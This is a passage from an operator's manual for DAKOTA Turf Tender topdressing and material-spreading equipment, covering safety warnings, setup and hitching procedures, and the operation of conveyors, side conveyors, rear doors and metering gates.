for the trailer-type Turf Tenders with hoppers larger than 1 cubic yard (410 & 411 models). 2. Use extreme caution, reduce speed, and maintain a safe distance when operating around sand traps, ditches, creeks, trees, ramps, unfamiliar areas, or other hazards. 3. Be alert for severe ground depressions, holes, or other hidden hazards. If an outside wheel (on trailer-type Turf Tenders) drops into a hole, it may cause the Turf Tender to tip over. 4. Use caution when operating the Turf Tender on slopes. Normally travel straight up or down slopes. Shift the vehicle into a lower gear before attempting to either go up or down a slope. 5. Avoid making turns on slopes. 6. Reduce speed when making turns. 7. Use extra caution when operating on wet surfaces, at high speeds, or with a full load. Stopping time increases with a full load. NOTE: A worst-case control scenario exists when the Turf Tender is being driven down a wet slope at an angle to the slope and the operator is attempting to turn and/or brake. Loss of control could result in an accident, tip over and serious injury or death. 8. Avoid sudden stops and starts. Do not go from forward to reverse or from reverse to forward without coming to a complete stop. 9. Do not attempt sharp turns or abrupt maneuvers or other unsafe driving actions which may cause loss of control. 10. If the vehicle’s engine stalls or loses headway on a hill, never attempt to turn the vehicle around. Always back straight down the hill in reverse. Never back down a hill in neutral or with the clutch depressed using only the brakes. 11. Make sure the area is clear prior to backing up. Back up slowly as the visibility behind the Turf Tender hopper is limited. 12. Always avoid low hanging objects such as tree limbs, doorways, door jambs, power lines, etc. Ensure there is enough clearance for both you and the machine(s) you are operating. 13. Always avoid objects, which may “hook” the wheels such as trees, posts, etc. Be constantly aware of the width and turning radius of the Turf Tender. Failure to do so may result in damage to the vehicle or Turf Tender. 14. Watch out for traffic when near or crossing roads. Always yield the right of way to pedestrians and other vehicles. This vehicle was not designed for travel on streets or highways. Obey all traffic rules and regulations pertaining to controlled and uncontrolled traffic areas. 15. Limit load size if working on steep or rough terrain. 16. STOP and ask your supervisor if you are ever unsure about safe operation. LOADING WARNING Never load a trailer-type Turf Tender when it is uncoupled from its tow vehicle. When loading material, distribute the load evenly to keep it from shifting. Operate the Turf Tender with extra care when the hopper is full of heavy material. Slowly fill the hopper over a few seconds of time with the loader bucket as low as possible. Avoid “dropping” the load into the hopper from an excessively high loader bucket. This is safer in terms of maintaining a balanced load and will also extend the life of the Turf Tender. Make sure the material you are loading has uniform properties. Material that has few small rocks in it poses a projectile hazard. Material that has varying composition or moisture may result in widely varying application rates. Do not exceed the load capacity of the Turf Tender or vehicle. Refer to the Specifications section to determine the maximum load capacity of the Turf Tender. Never add sideboards to the hopper to increase its capacity for dense or heavy materials. The additional weight will increase the chance of tipping or rolling over. The hopper capacity of the may be increased for low-density materials such as peat. SAFE OPERATIONAL PRACTICES 7 GENERAL INFORMATION Owners and operating personnel must thoroughly read and understand this manual in order to properly operate, lubricate, and maintain the Turf Tender. Failure to do so could result in personal injury or equipment damage. Refer to this manual as frequently as necessary. LABELING AND TERMINOLOGY The Turf Tender and this manual use the following terms and symbols to bring attention to the presence of hazards of various risk levels and important information concerning the use and maintenance of the Turf Tender. WARNING: Indicates presence of a hazard which can cause severe personal injury, death, or substantial property damage if ignored. CAUTION: Indicates presence of a hazard which will or can cause minor personal injury or property damage if ignored. NOTE: Indicates supplementary information worthy of particular attention relating to installation, operation, or maintenance of the Turf Tender but is not related to a hazardous condition. Be sure to follow all instructions and related precautions as they are meant for your safety and protection. This manual is considered a permanent part of the Turf Tender and must remain with the Turf Tender when sold. Use only the correct replacement parts and fasteners. Right and left-hand sides are determined by facing in the direction of forward travel. Record the model and serial numbers in the specifications section so they are readily available when contacting a dealer for parts or service. Many owners employ the dealer’s Service Department for all work other than routine care, cleaning, and adjustments. We strongly urge the use of genuine DAKOTA parts to protect the investment in your Turf Tender. Our warranty is provided to support customers who operate and maintain their equipment as described in this manual. This warranty provides you the assurance that DAKOTA will back its products where defects appear within the warranty period. Should the equipment be abused, or modified to change its performance beyond the original factory specifications, the warranty will become void and field improvements will be denied. AUTHORIZED MAINTENANCE Perform only the maintenance described in this manual that you are qualified to perform. If major repairs are ever needed or assistance is desired, contact an Authorized DAKOTA Dealer for their professional service. UNLOAD HOPPER PRIOR TO DOING MAINTENANCE Any material in the hopper must be removed prior to performing maintenance on or beneath the Turf Tender. POWER OFF MAINTENANCE AND ADJUSTMENTS All maintenance and adjustments to the Turf Tender must be made with the vehicle’s parking brakes set and engine off. On trailer-type Turf Tenders the vehicle must remain coupled to the Turf Tender. Failure to do so could result in injury or even death. 8 TIRES Check the tires frequently for cracks, checks, and proper inflation. An under inflated tire poses a significant tipping and braking hazard and may cause an accident, injury and death. Do not attempt to jack or perform tire maintenance with material in the hopper. For trailer-type Turf Tenders, the recommended tire pressure operating range is 13-18 psi (90124 kPa) for 26.5 in. tires and 15-22 psi (115-169) for 33 in. tires. Do not exceed the maximum tire pressure listed. Tire pressure is an indication of the ground pressure the Turf Tender has on turf; however, using a tire pressure which is too low may cause tire problems and also result in nonuniform ground pressure at the tire’s face. NOTE: For mounted-type Turf Tenders, follow the tire inflation guidelines found in the vehicle’s Operator’s Manual or on the sidewall of the tire. MAINTAIN SAFE OPERATING CONDITIONS Grease all fittings as described in this manual. Proper lubrication is essential for the safe operation and longevity of the Turf Tender. Check the conveyor belt(s) for stretch and proper alignment; adjust accordingly. Each conveyor belt has a Vbelt vulcanized to the back side of the belt to help maintain proper alignment and carry most of the load; however, it is still necessary to check and adjust (if necessary) belt alignment. Do not allow hydraulic fluid to come in contact with the belt. The PVC belt material is resistant to fertilizers, but hydraulic fluid causes the PVC coating on the belt to decompose. One of the most common causes of hydraulic fluid on the belt is the placing of uncoupled hose-ends in the hopper. Under no conditions should this be done. RELIEVE HYDRAULIC PRESSURE Before disconnecting or performing any work on the hydraulic system, all pressure in the system must be relieved by turning all Turf Tender control switches to their OFF position, placing the hydraulic supply valve in the float position, and stopping the engine of the vehicle. Residual hydraulic pressure may still be present, so care must be taken. Make sure parts of the Turf Tender actuated by hydraulic pressure are supported or otherwise restrained to prevent movement prior to relieving hydraulic pressure. Failure to do so could result in damage, injury or even death. KEEP TURF TENDER CLEAN Keep the Turf Tender free of excessive grass, leaves, and accumulations of dirt and sand. Materials such as this can compromise seals and bearings. REPLACEMENT PARTS To ensure optimum performance and safety, always purchase genuine DAKOTA replacement parts and accessories. NEVER USE “WILL-FIT” REPLACEMENT PARTS AND ACCESSORIES MADE BY OTHER MANUFACTURERS. Using unapproved replacement parts and accessories voids the warranty of the DAKOTA Turf Tender. GENERAL INFORMATION SAFETY AND INSTRUCTION DECALS The following decals are installed on the Turf Tender. If one should become damaged or illegible, replace it. The decal part numbers are listed below. Replacement decals may be ordered from an Authorized DAKOTA dealer. Side Crush Hazard Location - top of side conveyor, each side lower end of side conveyor p/n 11464 Cutting Finger/Hand Hazard Location - outer corners of shield over twin spinners p/n 11466 Hand Crush Hazard Location - electric front door, lower end side conveyor, conveyor rest, rear door p/n 11468 Hydraulic Puncture Hazard Do Not Stand Here Location - front side of hopper, near top Location - fender left side, fender right p/n 11469 side, spinner shield each side p/n 11476 Tip Or Roll Hazard Location - front of hopper near top P/N 11435 No Maintenance When In Use Location - near drive motor on main conveyor, front of hopper p/n 11472 Do Not Run Without Guards Location - spinner package on shield, front side of hopper p/n 11471 Blade Running Counterclockwise Location - top side of right spinner p/n 11474 Entrapment Hazard Location - front and rear of hopper, near top p/n 11465 Hand Entanglement Hazard Location - Inside front door, outside front door, top of side conveyor p/n 11467 Stay Clear Location - spinner left and right sides p/n 11475 Blade Running Clockwise Location - top side of left spinner p/n 11473 Consult Service Manual Location - front of hopper near top p/n 11470 GENERAL INFORMATION 9 SETUP TRAILER-TYPE TURF TENDERS To properly setup the Turf Tender, several items will need to be performed in conjunction with the tow vehicle. You will need to install the power cord and control box mount on the tow vehicle. The power cord supplies electrical power to the control box from the tow vehicle. This power cord should be left in place after the initial installation. CAUTION Always complete a safety inspection before hooking to the tractor and before using the Turf Tender. This safety inspection “walk around” is described in the safety section of this manual. Main Power Cable 1. Route the power cord from the battery, beneath the tractor platform, and over to the right rear fender of the tractor. Make sure the cord does not contact any hot or moving parts and will not be pinched under the fender. Leave some slack in the cord at the control box end so that the cord will not pull loose if the control box shifts or moves. 2. Using cable ties, attach the cord to the tractor in several places. Make sure the cord will not come loose and move into a position to become pinched or cut. 3. Attach the red wire eyelet to the positive terminal and the black wire eyelet to the negative terminal on the tractor battery. NOTE: If it is desired to mount the control box to the roll bar of the tractor, a bracket must be designed and built. CAUTION Do not drill holes in the roll bar to mount the control box bracket to the roll bar. Holes in the roll bar may weaken the structure. Hold the bracket in the desired mounting location making sure there are no electrical wires in the area (above and below the fender). Using the bracket as a template, mark the location for the four mounting holes on the fender; then center punch the holes. Remember to allow room for removal and installation of the control box from the bracket without interference since the control box stays with the Turf Tender when unhooked from the tractor. Using a 1/4 in. drill bit, drill the holes in the fender. Using the hardware included, secure the bracket to the fender; tighten securely. Remove the 7/16 in. nut securing the control box to the Turf Tender. It is for shipping purposes only and is not needed for regular use or storage. CAUTION Before using Turf Tender for the first time, check the wheel bolts to make sure they are tight. They must be torqued to 90 ft-lb (12.4 kg-m). Mounting The Control Box WARNING Recheck each wheel bolt’s torque within the first 1 hour of use and every 10 hours thereafter until the bolts maintain the proper torque. Failure to do so may result in a serious accident. CAUTION It is the operator’s responsibility to inspect and torque the lug bolts upon delivery and during normal usage. The mounting bracket for the control box is to be mounted in a position convenient for the operator (either on the right rear fender, on the dash, or to the roll bar of the tractor). Select a location for mounting the bracket making sure you will be able to remove and install the control box from the bracket without interference. To mount the bracket to the fender, use the following procedure: 10 WARNING Check the tire pressure on all tires and look for any obvious leaks in the hydraulic system prior to each use. Failure to do so may result in a serious accident. SETUP MOUNTED-TYPE 410T TURF TENDERS WARNING Do not allow anyone to work beneath an elevated lift frame unless a safety bar is in place on one or both of the lift cylinder shaft(s). For the John Deere ProGater, install the standard John Deere Safety Bar. For the Toro Workman, install the DAKOTA Safety Bar. NOTE: The Safety Bar may be stowed above the standard Toro Safety Bar. 2. While wearing gloves and safety glasses, hold the longest free side of each band; then carefully cut each of the bands (as close as possible to a corner) securing the hopper to the skid. CAUTION The bands are under tension. Wear gloves and safety glasses. Cut as close as possible to a corner while holding the longest free side of each band. 3. Insert the Dakota Lift Bar (p/n 11361) beneath the sides and rear lip of the hopper. NOTE: Prior to mounting the Turf Tender 410T on the Toro Workman, it is required to install the proper Auxiliary Hydraulic Kit. Order the proper kit (gasoline or diesel engine) for your machine; then using the installation instructions included with each kit, install the kit. Removing Components From Skid 1. To avoid damage, transport the hopper/skid carefully. 4. Lift the hopper straight up until clear of the pedestal on the skid. Hold securely until ready to place on either the vehicle or hopper legs. WARNING Do not allow anyone beneath the raised hopper. 5. Remove the two front legs and two jack legs from the skid. 6. Lift hopper just high enough to insert the front legs into the receivers on the front cross member beneath the fenders. 7. Insert the jack legs (with jack handles facing outward) into the receivers at the rear of the hopper. Secure the jack legs with the quick pins provided. 8. Set the hopper down onto the legs; then remove the lift bar. SETUP 11 9. Remove the remaining components from the skid. NOTE: The electrical harness and miscellaneous loose parts are stowed inside the pedestal. Installing Harness And Control Box TORO WORKMAN MODELS 1. Route electrical harness from the right rear hinge (1) along hydraulic hoses above trans-axle to the left side near the battery (2). 4. Place the control box bracket in the desired mounting location (within easy reach and view of the operator) on the dash making sure there are no electrical wires in the area (below the dash). Using the bracket as a template, mark the location for the four mounting holes; then center punch the holes. 5. Using a 1/4 in. drill bit, drill the holes in the dash. Using the hardware included, secure the bracket to the dash; tighten securely. 6. Place the control box onto the bracket and secure. 7. Attach the red wire eyelet to the positive terminal and the black wire eyelet to the negative terminal of the battery and pump/cooler harness; then connect the wiring harness to the control box. 8. Using cable ties, secure the harness along its route to prevent abrading, pinching, and contact with hot surfaces. JOHN DEERE PROGATOR MODELS 1. Route the electrical harness from the right rear hinge (1); to the battery area (2); over to the right frame rail (3); then follow hydraulic tube lines beneath the passenger seat (4). 2. Continue along left side below the cab to the steering shaft opening. 3. Route the harness up through the opening behind the brake pedal. SETUP 12 2. Enter the cab through rubber grommet located in the center of the floorboard. 3. Place the control box bracket in the desired mounting location on the dash making sure there are no electrical wires in the area (behind the dash). Using the bracket as a template, mark the location for the four mounting holes; then center punch the holes. 4. Using a 1/4 in. drill bit, drill the holes in the dash. Using the hardware included, secure the bracket to the dash; tighten securely. 5. Place the control box onto the bracket and secure. 6. Attach the red wire eyelet to the positive terminal and the black wire eyelet to the negative terminal of the battery; then connect the wiring harness to the control box. 7. Using cable ties, secure the harness along its route to prevent abrading, pinching, and contact with hot surfaces. Installing Deflector And Spinner Shield 1. Place deflector across the bottom of the hopper and secure to the hopper frame with two bolts and nuts. Tighten securely. 2. Remove two rear screws securing each hydraulic motor. 3. Place the angles on the deflector and secure. 4. Place the spinner shield into position and secure using the angles and rear screws of each hydraulic motor mount. 4. For each cylinder, align the lift cylinder end with the cylinder frame mount; then install the lift cylinder rodend pin. 5. Fully extend the lift cylinder; then install the safety bar on cylinder rod. WARNING Do not allow anyone to work beneath the hopper unless the safety bar is in place on lift cylinder rod. 6. Remove front legs. 7. Connect the electrical harness at right rear. 8. Noting the supply and return hydraulic couplings for both the utility vehicle and hopper and making sure the couplings are clean, connect the two hydraulic hoses. The hoses must be attached to the proper couplings for the Turf Tender to operate properly. NOTE: The hose that goes to the supply coupling is marked at the factory with a plastic zip tie. CAUTION Make sure that the hose ends and utility vehicle couplings are clean before hooking up hydraulic hoses. Contamination of the hydraulic system may cause failure of components on the Turf Tender and utility vehicle. 9. Remove the safety bar and completely lower the hopper. 10. Test run to confirm proper operation and check for any hydraulic leaks. REMOVING HOPPER WARNING The hopper must be completely empty prior to removing. Failure to empty the hopper prior to removal may result in a tipping hazard resulting in damage, injury, or even death. 1. Find a level, dry, firm place to store the Turf Tender. 2. Disconnect the hydraulic hoses from the hopper. Cap ends to keep dirt from contaminating the hydraulic system. 3. Disconnect two electrical connectors near the right hinge point. 4. Raise hopper sufficiently to install front legs; then install the front legs. Lower hopper so legs are resting on the ground and each cylinder rod pin is loose. 5. Remove the pin from rod end of each lift cylinder; then lower the cylinder. Place the cylinder rod end pin(s) back into position. 6. Insert the jack legs (with jack handles facing outward) into the receivers at rear. Secure the jack legs with the quick pins provided. Installing Hopper 1. Carefully back under the hopper until the rear hinges line up with pivots on hopper frame. 2. Using the jacks, align the pivots and hinges; then insert the hinge pins and secure. 3. Lower and remove the jacks. SETUP 13 7. Jack up the rear of the hopper to take pressure off the hinge pins; then remove them. Keep hinge pins with the vehicle for the mounting of other units. 8. Drive straight ahead to clear hopper. SELF-CONTAINED TURF TENDERS Self-contained Turf Tenders have their own power supply and hydraulic system. The power supply used is a Honda 11 hp engine. The engine provides power to the hydraulic pump which draws hydraulic fluid from the reservoir and circulates the fluid to the drive motors on the Turf Tender. In addition to following the setup information for trailertype Turf Tenders, the following information must also adhered to. Before Operating For The First Time 1. Check the level of the hydraulic fluid. A sight gauge is built into the front side of the reservoir. Fill as required. 2. Check the oil and gasoline levels in the engine. Fill as required. NOTE: The engine has oil fill/check caps and drain plugs on both sides. The gray plug is the dipstick and is located on the front side of the engine. 3. Read and understand all information in the Honda engine Operator’s Manual. Note: This engine has no Transmission/centrifugal clutch; therefore, ignore pages 29-30 in the Honda engine Operator’s Manual. 2. Check engine oil and gasoline levels. 3. Check the position of the choke, fuel valve, throttle and key switch. See the engine manual for proper use of each. 4. Ensure master switch on control box is in the OFF position. Be sure all persons are clear of conveyor and spinner areas; then using the key switch on the control box, start the engine. Before Starting Engine 1. Using the sight gauge, check the oil level in the hydraulic reservoir. 14 SETUP OPERATION SAFETY INSPECTION Introduction Every day before operating the Turf Tender, it is important to perform a safety inspection “walk around” of the Turf Tender. The purpose of the safety inspection is to inspect the Turf Tender for any unsafe conditions and maintenance concerns. Finding these conditions before using the Turf Tender can save time, money, and the possibility of injuries. Check for loose nuts or bolts, broken or cracked metal and welds, bent or damaged components, under-inflated tires and leaking hydraulic components and hoses. Any of these conditions may indicate a potentially serious situation. All Turf Tender models require the same basic safety inspection procedure. On trailer-type models, start the inspection at the hitch. Check the hitch for excessive wear or cracks. Check the tongues of the hitch coupler (the part that directly hitches to the tractor drawbar). The coupler is made of cast iron and designed to break away in case the Turf Tender is driven on an unsafe slope and rolls. The cast iron tends to wear faster than steel and does wear out. This coupler may be turned over to allow wear on both tongues before replacement is necessary. Make sure the bolts attaching the hitch are not loose. On models with a front door, check to make sure the track is not full of material and that it has not been damaged. At the back of the Turf Tender, continue to look for hydraulic leaks and other unsafe conditions. Check the conveyor belt for damage and proper alignment. Make sure the shield over the twin spinners is not bent or interfering with the operation of the spinners. Make sure the rear door and gate are not bent or damaged and are closed as much as needed for the materials you will be hauling. By hand, rotate each spinner to ensure that it is not bent and clears other parts of the spinner/chute assembly. On the right side of the Turf Tender, visually, make sure the tire(s) are inflated properly. On models with a side conveyor, check the side conveyor for damage and proper alignment. Check for any signs of hydraulic leaks. Check the left side of the Turf Tender for any unsafe conditions. Much of the hydraulic system is based on this side. Check for any hydraulic leaks. Visually, make sure the tire(s) are inflated properly. If in doubt, use a tire gauge and check the tire pressure. Check for loose wires. All wiring should be secured to the Turf Tender and should not be hanging loose. When finished with the safety inspection and any repairs or adjustments that need to be made, the Turf Tender is ready for operation. OPERATION 15 HOOKING TO THE TRACTOR (TRAILER MODELS) It is required that the tractor be equipped with a regular drawbar. Set the drawbar length to the longest position for maximum turning clearance between the tractor and the Turf Tender. Do not use either a 3-point drawbar or any type of clevis hitch. NOTE: The jack stand can also be removed completely and stored in the toolbox if that is desired. The jack stand should always be kept near the Turf Tender if it becomes necessary to unhook quickly. CAUTION Do not use a 3-point drawbar since it limits maneuverability. It may also damage the hitch on the Turf Tender. Back the tractor up to the Turf Tender so that the tractor drawbar lines up with the hitch on the Turf Tender. Set the parking brake and shut off the tractor. Using the Turf Tender jack stand, level the Turf Tender; then compare the height of the tractor drawbar with the height of the hitch. If necessary, adjust the height of the hitch coupler so that the Turf Tender, when pulled, will be level. To adjust hitch coupler height, remove the bolts and nuts securing the coupler, move the coupler either up or down as necessary, and secure with the bolts and nuts. Tighten securely. Using the jack stand on the Turf Tender, raise or lower the hitch as needed to align the tractor drawbar and hitch. Start the tractor, release the parking brake, and back into position. NOTE: Adjustment of the hitch coupler height will only have to be made the first time the Turf Tender is to be hooked up to the tractor. Set the parking brake and shut off the engine. Secure the Turf Tender to the drawbar using a 5/8 inch pin. Secure the pin with either a hitch pin or cotter key. Noting the supply and return hydraulic couplings for both the tractor and Turf Tender and making sure the couplings are clean, hook up the two hydraulic hoses to the tractor couplings. The hoses must be attached to the proper couplings for the Turf Tender to operate properly. NOTE: The hose that goes to the supply coupling on the tractor is marked at the factory with a plastic cable tie. The tractor supply coupling will vary from tractor to tractor. CAUTION Make sure that the hose ends and tractor couplings are clean before hooking up hydraulic hoses. Contamination of the hydraulic system may cause failure of components on the Turf Tender and tractor. CAUTION Do not use bolts or other substitutes for a hitch pin. These may not be strong enough and may cause the Turf Tender to disconnect. Using the jack stand, lower the hitch of the Turf Tender until all Turf Tender weight is on the drawbar of the tractor and the jack stand is loose. Remove the pin securing the jack stand, turn the jack stand 90 degrees counterclockwise (putting the bottom of the jack stand toward the rear of the Turf Tender) and install the pin. This is the stow position for the jack stand and will keep it out of the way during all operations. 16 OPERATION Excess hose and wiring harness length should be coiled and secured to the top of the Turf Tender’s hitch frame. If the same tractor is used with the Turf Tender every time, the excess hose and harness length coil my be left secured to the hitch. Leave some slack in both the hoses and the wiring harness for turning and maneuvering the Turf Tender. CAUTION Do not allow the hoses or wiring harness to wrap around any parts of the tractor or to drag on the ground. Remove the control box from the front of the Turf Tender. Start the tractor engine; then engage the tractor hydraulic system. Test all functions of the Turf Tender. If the hydraulic functions of the Turf Tender are not operating properly, more than likely the hoses are hooked up backwards. If everything works properly, the Turf Tender is ready for operation. NOTE: If necessary to switch the hose connections, set the parking brake, if you have released it, and shut off the tractor engine. Relieve the pressure on the hydraulic system by moving the tractor hydraulic valve to the neutral position; then switch the hydraulic hose connections. Start the tractor engine and test the hydraulic functions of the Turf Tender. UNHOOKING FROM THE TRACTOR (TRAILER MODELS) Slide the control box into the mounting bracket on the tractor. Secure by tightening the screws on the back of the bracket. WARNING The Turf Tender must not have any material in the hopper when uncoupling. Failure to empty the hopper prior to unhooking from the tractor may result in a rear tipping hazard resulting in damage, injury or even death. Find a level, dry place to park the Turf Tender. Set the parking brake on the tractor and shut off the engine. WARNING Park the Turf Tender on a flat, solid surface. Parking the Turf Tender on an incline may create an unsafe condition. It may be necessary to chock the Turf Tender wheels to remove the possibility of it rolling from its parked position. Inspect the 2-wire power cord connector to make sure it is clean and not worn or damaged. Good electrical connections are important so all functions, especially if equipped with electric brakes, are working properly. Connect the 2-wire power cord to the control box. CAUTION Do not allow the hoses or wiring harness to wrap around or fasten to any part of the tractor other than the connectors at the tractor. The hoses and wiring harness are designed to pull loose if the Turf Tender disconnects. Relieve the pressure on the hydraulic system by moving the tractor hydraulic valve to the neutral position. Unplug the control box from the 2-wire power cord. Loosen the screws on the back of the bracket; then remove the control box from the mounting bracket. Place the control box in the storage position on the front of the Turf Tender. Make sure the wiring harness is not wrapped around any part of the tractor during the transfer of the control box to its storage position. Disconnect the hydraulic hoses. Coil and cap them and place them on the top of the hitch frame for storage. Do not allow the hoses to fall in the dirt. Also, do not set the hoses in the hopper or on the conveyor belting. CAUTION Do not allow hydraulic oil from the hoses to come into contact with the conveyor belt. The belt is made of a PVC compound to resist damage by fertilizers but it can be damaged by hydraulic oil. OPERATION 17 Remove the pin securing the jack stand in the stow position; then turn the jack stand upright and install the pin. Using the jack stand, lift the hitch of the Turf Tender until it is no longer putting weight on the tractor drawbar. Chock the Turf Tender wheels to prevent movement; then remove the pin from the hitch. Make sure there is no further connection between the tractor and the Turf Tender. Get on the tractor, start the engine, release the parking brake and drive away. WARNING The Turf Tender must be hooked up to the tractor prior to loading. Failure to do so may result in damage, injury or even death. HOPPER CONVEYOR BELT SYSTEM Overview The conveyor running along the bottom of the hopper on the Turf Tender is used to unload the hopper. It is generally run backward to unload material from the back of the hopper. On models with a front door, the conveyor may be reversed to run material out the front. The conveyor controls are located on the control box, which should be mounted on the towing vehicle. Two types of belts are used (depending upon model) for the hopper conveyor. Spliced and endless belts are the two types of belts used. Each conveyor belt has a center V-belt vulcanized on the inner side to help keep the belt centered on the rollers. Instructions for tightening of the belt and belt replacement follows later in the Maintenance section. On larger models (414, 420, and 440), the conveyor has drive motors on each end. The dual drive motor design gives additional power in each direction and also helps limit the chances of belt slipping off track. On the 420 and 440 models, a diamond wiper system is located between the belts in the center of the hopper. This wiper is used to help eliminate a buildup of materials on the inner side of the belt. A material buildup could cause the belt to run off track or jam. The diamond wiper generally prevents these problems. Turf Tender models are equipped with either an electric or manual control to adjust the speed of the conveyor belt. On all models (except the self-contained models, the master switch must be turned on first to allow the other controls to function. The red light on the control box will be illuminated when the master switch has energized the rest of the control box functions. 18 NOTE: To prevent battery discharge, remember to turn the master switch and the towing vehicle’s ignition switch to the OFF position when not using the Turf Tender. On models with only a rear gate, the conveyor switch is a two position switch (ON and OFF). On models with front and rear gates, the conveyor switch is a three position switch (REARWARD-OFF-FORWARD). Moving the switch from the OFF position, will engage the belt in the direction as indicated on the switch decal. To unload the hopper, be sure to open the appropriate gate before running the conveyor. The gate(s) may be left open a limited amount if the material being hauled does not leak out when the conveyor is not running. NOTE: Before starting the main conveyor belt when unloading from the rear, always first activate the spinners. Failure to due so will result in material piling up on the spinners. The speed of the spinners may be adjusted to control the spread width of the Turf Tender. There are two methods to adjust hydraulic flow to the Turf Tender. Increasing the speed of the conveyor increases the amount of material being unloading. Use the appropriate section below to adjust conveyor belt speed. NOTE: Conveyor belt speed may also be adjusted by changing the throttle speed on the vehicle (or engine) supplying the hydraulic power. Speeding up the engine will speed up hydraulic flow to the machine. This will speed up the operation of all features of the Turf Tender. ELECTRIC-CONTROL MODELS The master switch on the control box activates the hydraulic valve. Once the master switch is in the ON position, the switch marked “conveyor” will turn the conveyor ON and OFF. The conveyor speed dial controls the belt speed (flow rate) of material. Faster belt speeds result in higher application rates. The numbers on the dial’s scale do not represent any particular units, they are simply reference numbers to allow you to set the speed the same each time. The relationship between flow rate and dial scale are fairly linear; therefore, if the dial was initially set at 40, raising the setting to 80 would roughly double the material application rate. OPERATION MANUAL-CONTROL MODELS Hydraulic flow to the Turf Tender is controlled by the hydraulic controls of the tow vehicle. As soon as the tow vehicle’s hydraulic system is activated, the spinners will spin. Once the hydraulic system is ON, the switch on the control box marked “conveyor” controls the ON/OFF function of the hydraulic valve. On the manual-control system, conveyor speed adjustments are made on the valve located on the side of the Turf Tender. The speed of the conveyor. SIDE CONVEYOR Overview The side unloading conveyor is a unique option of the Turf Tender line of material handling systems. It allows the vehicle operator, while seated on the tractor, to control the unloading of materials with a complete view of the operation. The side conveyor may be used to fill other smaller Turf Tenders, sand bunkers, trenches or almost anything else you may want to unload material into. Keep the small top dressers busy by filling them out on the job site rather than pulling them back to the supply pile. NOTE: On manual-control models, the control box switch marked “spinners” is a dummy switch. The spinners are only turned ON and OFF by activating or deactivating the tow vehicle’s hydraulic system. There are two positions for the side conveyor. The traveling position is when the side conveyor is retracted and rests against the side of the hopper. The operating position is when the side conveyor is fully extended to the side. CAUTION Do not adjust conveyor or spinner speeds on manual-control models while operating the Turf Tender. The operator should always remain seated on the vehicle when the engine is running and no other people should be near the Turf Tender while the engine is running. To safely adjust the hydraulic flow on all models except the electric-control models, Dakota recommends that: 1. Operator sets parking brake. 2. Operator shuts off the engine. 3. Operator dismounts and adjusts flow. 4. Operator returns to vehicle and starts engine. 5. Operator tests Turf Tender using new setting. 6. Operator repeats process as often as necessary to obtain correct flow and conveyor speed. The normal operating procedure is to preset the conveyor speed; then as you pass onto the area you want to spread material, turn the conveyor switch to the ON position. As you travel off the area, turn the switch to the OFF position. Generally it is recommended to run the conveyor at a fairly high speed and adjust the rear metering gate to control the application rate. Conveyor speed affects the placement of material on the spinners. Slow conveyor speeds result in the “holding” of material on the spinners longer resulting in more wrap around. With some materials, having too fast of a conveyor speed may result in a very narrow spread pattern (where all the material is discharged directly behind the Turf Tender). Traveling Position Operating Position The conveyor must be fully extended to the operating position to be used. If it is not fully extended, the material from the main conveyor will spill before being unloaded onto the side conveyor; thereby, dumping most, if not all, of the material in front of the Turf Tender rather than unloading onto the side conveyor. Three switches control the functions of the side conveyor. The side conveyor IN/OUT switch swings the conveyor in and out. The UP/DOWN switch raises and lowers the side conveyor. A third switch on the control box activates either the side conveyor or the spinners. Pushing the switch one way activates the side conveyor; pushing the switch the other way activates the spinners. All three switches have a center position which is the OFF position. Lifting the side conveyor to its highest position and lifting the hood makes it more effective for filling bunkers or holes as the material can be thrown further. Varying the throttle speed of the tractor while unloading allows the material to be spread over a wider area. The electric hood position is controlled by one switch. Push the switch away from the tractor operator and hold to lift the hood. Pull the switch toward the operator and hold to lower the hood. Releasing the switch at any point will stop the hood at whatever position it is in. OPERATION 19 Lowering the side conveyor to its lowest position makes it easier and more accurate for filling trenches, pots, or areas that require some degree of unloading accuracy. With the hood at the end of the conveyor in the down position it forms a spout that helps keep the unloading materials in more of a controlled space and results in less time spent cleaning up. Operation To unload the hopper using the side conveyor, use the following procedure: 1. Open the front gate to the desired height. NOTE: On models equipped with electrically activated front gate, use the switch on the control box to open the gate to the desired height. 2. Using the IN/OUT switch, move the side conveyor to the operating (fully extended) position. 3. Using the UP/DOWN switch, adjust the side conveyor to the desired height. NOTE: If desired to throw the material further, use the HOOD switch to raise the side conveyor hood. 4. Activate the side conveyor; then start the hopper conveyor. NOTE: Always activate the side conveyor before starting the main conveyor. This prevents the buildup of material on the side conveyor and limits excessive wear and belt-related problems. 5. If moving while unloading the hopper using the side conveyor, be sure to stay away from trees, poles and other obstacles which may come in contact with the side conveyor. Also, do not drive too closely to bunkers and other dropoffs. WARNING Do not drive too close to edges of bunkers or other dropoffs. The Turf Tender may roll over if the edge collapses under the outside wheel or if it is maneuvered incorrectly. This could result in injury or death. 6. Shut off the hopper conveyor; then turn the side conveyor off so material does not build up on the side conveyor. 7. Using the UP/DOWN switch, lower the side conveyor to the fully down position; then using the IN/OUT switch, move the side conveyor to the traveling position. 8. Close the front gate. HYDRAULIC REAR DOOR (Optional) The hydraulic rear door is designed to allow the operator to unload material quickly without leaving the seat of the tractor. A switch on the control box operates the hydraulic rear door. Pushing the switch away from the operator opens the door; pulling the switch toward the operator closes the door. An indicator rod gives the operator an indication of how far the door is open. CAUTION Never close the hydraulic rear door when the hopper is full of material. Trying to close the door when the hopper is full could result in damage to the door or to the rear of the hopper. The door should always be closed prior to filling the hopper. The rear door is a structural component of the hopper assembly, and as such, it must be kept tightly closed when the hopper contains material and the Turf Tender is being towed over rough terrain. Failure to keep the door closed in these conditions may result in cracking of the hopper assembly. NOTE: It is not uncommon for the hydraulic system to “bleed down” or lose pressure when not in use. Avoid leaving the hopper full of material when not in use since the material may push the rear door open as the hydraulic pressure bleeds down. CAUTION The side conveyor must be in the fully down position prior to swinging it in to the travel position next to the hopper. Failure to do so will result in damage to the Turf Tender. 20 OPERATION REAR METERING GATE As you test the metering gate for material flow, you should also check for material leakage under the side wipers of the hopper. Manual Rear Metering Gate The rear metering gate is designed to regulate the flow of material out of the hopper. Two types of the metering gate are available: hand crank, or manual opening. NOTE: Stainless steel inserts may be purchased and installed to limit the width of the gate opening on 412, 414, 420, and 440 models. Narrowing the gate opening gives a little better control over spread distribution with difficult material such as wet, sticky sand. The rear metering gate may be left open a limited amount if the material you are hauling across your facility does not flow (leak) out when the conveyor is not running. Dry sand and fertilizers are especially bad for leaking out and we recommend the metering gate be fully closed when transporting these materials. There is a scale beside the gate to show you how far the gate is open (general reference only). The gate opening height for each operation will need to be determined. For example, a light topdressing may require the gate to be open 1/8 in. (3 mm); whereas, for a 